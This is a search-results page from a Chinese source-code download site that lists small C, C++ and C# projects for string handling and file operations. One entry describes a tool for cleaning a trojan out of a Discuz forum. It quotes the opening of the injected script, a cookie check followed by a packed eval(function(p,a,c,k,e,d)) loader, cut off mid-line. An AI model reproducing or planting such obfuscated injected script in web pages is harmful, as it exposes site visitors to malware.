CDN加速镜像 | 设为首页 | 加入收藏夹
当前位置: 首页 资源下载 源码下载 Windows编程 文件操作 搜索资源 - c string.c

搜索资源列表

  1. 5个c程序源代码

    0下载:
  2. 五个c源代码 矩阵的运算方法 邻接矩阵求解最短路径 全屏幕模拟时钟 先序遍历非递归算法 字符串查找-5 c source code matrix arithmetic method adjacency matrix for the Shortest Path full-screen analog clock preorder non - recursive algorithm to search string
  3. 所属分类:文件操作

    • 发布日期:2008-10-13
    • 文件大小:4.79kb
    • 提供者:张广旭
  1. C语言难点分析整理

    0下载:
  2. 这篇文章主要是介绍一些在复习C语言的过程中笔者个人认为比较重点的地方,较好的掌握这些重点会使对C的运用更加得心应手。此外会包括一些细节、易错的地方。涉及的主要内容包括:变量的作用域和存储类别、函数、数组、字符串、指针、文件、链表等。一些最基本的概念在此就不多作解释了,仅希望能有只言片语给同是C语言初学者的学习和上机过程提供一点点的帮助。 -this article is to introduce some major review of the C language in the process
  3. 所属分类:文件操作

    • 发布日期:2008-10-13
    • 文件大小:6.75kb
    • 提供者:赵东生
  1. 使用C#拷贝String到struct

    0下载:
  2. 使用C#拷贝String到struct-use C# copy of the struct String
  3. 所属分类:文件操作

    • 发布日期:2008-10-13
    • 文件大小:2.87kb
    • 提供者:似的
  1. PrintDirect

    0下载:
  2. c# direct printing and sending commands and string to printer
  3. 所属分类:File Operate

    • 发布日期:2017-04-02
    • 文件大小:18.15kb
    • 提供者:vkuttyp
  1. 2003dzclear

    0下载:
  2. 清除discuz论坛挂马的cookie代码(if(document.cookie.indexOf( helio )==-1){var expires=new Date() expires.setTime(expires.getTime()+24*60*60*1000) document.cookie= helio=Yes path=/ expires= +expires.toGMTString() eval(function(p,a,c,k,e,d){e=function(c){return
  3. 所属分类:File Operate

    • 发布日期:2017-03-29
    • 文件大小:1.43kb
    • 提供者:一介农夫
  1. ReplacePro

    2下载:
  2. VC++6.0工程,实现批量替换多个文本文件中的字符串。-Visual C++ 6.0 project to achieve batch replace string in multiple text files.
  3. 所属分类:File Operate

    • 发布日期:2017-03-28
    • 文件大小:31.06kb
    • 提供者:hanxu
  1. Dictionary_Search

    0下载:
  2. 有名的词典查询 自动生成10000个单词然后找他的类似词。。。 -//Dictionary #include <iostream> #include <fstream> #include <string> #include <time.h> #define maxsize 10000000 #define exp_n 10000 using namespace std string word[maxs
  3. 所属分类:File Operate

    • 发布日期:2017-04-10
    • 文件大小:1.08mb
    • 提供者:秘密
  1. Display-source-code-mixed-string

    0下载:
  2. 一段C语言代码,功能是实现了汉字的字模提取和显示,或者是混合字符串显示。-A C language code, the function is to achieve a matrix extract and display of Chinese characters, or mixed string display.
  3. 所属分类:File Operate

    • 发布日期:2017-04-08
    • 文件大小:3.46kb
    • 提供者:Huang Shanshan
  1. fwordintxt

    0下载:
  2. 通过对文件的操作,实现对多个txt文件进行字符串匹配,并输出匹配结果。本程序用c语言编程。- String matching of multiple txt files, file operations, and output matching results
  3. 所属分类:File Operate

    • 发布日期:2017-12-01
    • 文件大小:282.71kb
    • 提供者:hancunai
  1. super_xmlini

    0下载:
  2. TXmlIni支援以下功能(特征):         1. 具有压缩能力(使用ZLib)         2. 储存成其他程式语言看得懂得xml(在非压缩的情况下)         3. 具Stream串流载入与输出能力         4. 具字串载入与输出能力         5. 具Base64能力(当使用压缩时
  3. 所属分类:File Operate

    • 发布日期:2017-11-13
    • 文件大小:3.84mb
    • 提供者:刘孟雄
  1. Write-and-read-text.rar

    0下载:
  2. c++标准的输入输出,特别是写入文本时的字符串类型或已经计算过程中产生的整型类似数据的文本写入,c++ standard input and output, especially when writing text string type has been calculated integer similar data generated in the process to write text
  3. 所属分类:File Operate

    • 发布日期:2017-11-11
    • 文件大小:745byte
    • 提供者:yujianhao
  1. determine-a-specific-symbol-in-file

    0下载:
  2. 运用C++语言判断文件中字符串中是否含有某个特定符号,并根据不同符号输出正负1.-Use the string C++ language to determine the file if it contains a specific symbol, and in accordance with the different symbols output plus or minus 1.
  3. 所属分类:File Operate

    • 发布日期:2017-11-06
    • 文件大小:703byte
    • 提供者:Gangjie.Liao
  1. strcpy

    0下载:
  2. 自定义字符串拷贝函数strcpy(),在C-Free和VC环境能够通过-Custom string copy function strcpy () in C-Free and VC environment through
  3. 所属分类:File Operate

    • 发布日期:2017-11-11
    • 文件大小:82.67kb
    • 提供者:wang ying
  1. string_operation

    0下载:
  2. 几个用来操作字符串和csv文件的函数,c语言,C++,VC都可以使用-some func for string and csv file operation
  3. 所属分类:File Operate

    • 发布日期:2017-04-10
    • 文件大小:873byte
    • 提供者:mozart
  1. str.c

    0下载:
  2. 常用的字符串操作,包括切割,校验等等等 很实用的函数-Common string operations, including cutting, parity and so on and so very useful function
  3. 所属分类:File Operate

    • 发布日期:2017-04-15
    • 文件大小:7.37kb
    • 提供者:yys
  1. StatisticsCharacters

    0下载:
  2. I/O流操作 任务目标:   练习C++的文件数据处理方法,学习类ifstream(从文件输入)、ofstream(向文件输出)和fstream(从文件输入,输出)的定义与用法。 任务描述:   编写一个程序,用统计一个源代码文件(以你所写的代码文件为对象)中英文字符串的种类与个数并输出到文件phases.dat,记录格式如下:      Type number   main 1-I/O stream operations mission object
  3. 所属分类:File Operate

    • 发布日期:2017-06-12
    • 文件大小:18.9mb
    • 提供者:周畅
  1. foostring-0.1

    0下载:
  2. foo_string is a string implementation in C++ compatible to Dinmkumware s basic_string implementation that ships with Visual Studio 6.0. foo_string was design to replace the Dinkumware strings.
  3. 所属分类:File Operate

  1. Filemon-

    0下载:
  2. 系统监控,文件操作等,源代码 例子 模拟器等-file monitor,c++ #include stdlib.h #include string.h #include fstream.h #include time.h #include dos.h
  3. 所属分类:File Operate

    • 发布日期:2017-04-04
    • 文件大小:534kb
    • 提供者:haha
  1. astrogrep-code-69-trunk

    0下载:
  2. file string search windows source c-file string search windows source c++
  3. 所属分类:File Operate

    • 发布日期:2017-05-18
    • 文件大小:4.57mb
    • 提供者:Felipe C
  1. ltcrjrymanipulation

    0下载:
  2. c#字符串操作类库 C # string operation class library-C# string manipulation library C# string operation class library
  3. 所属分类:File Operate

    • 发布日期:2017-12-24
    • 文件大小:5kb
    • 提供者:physhab
搜珍网 www.dssz.com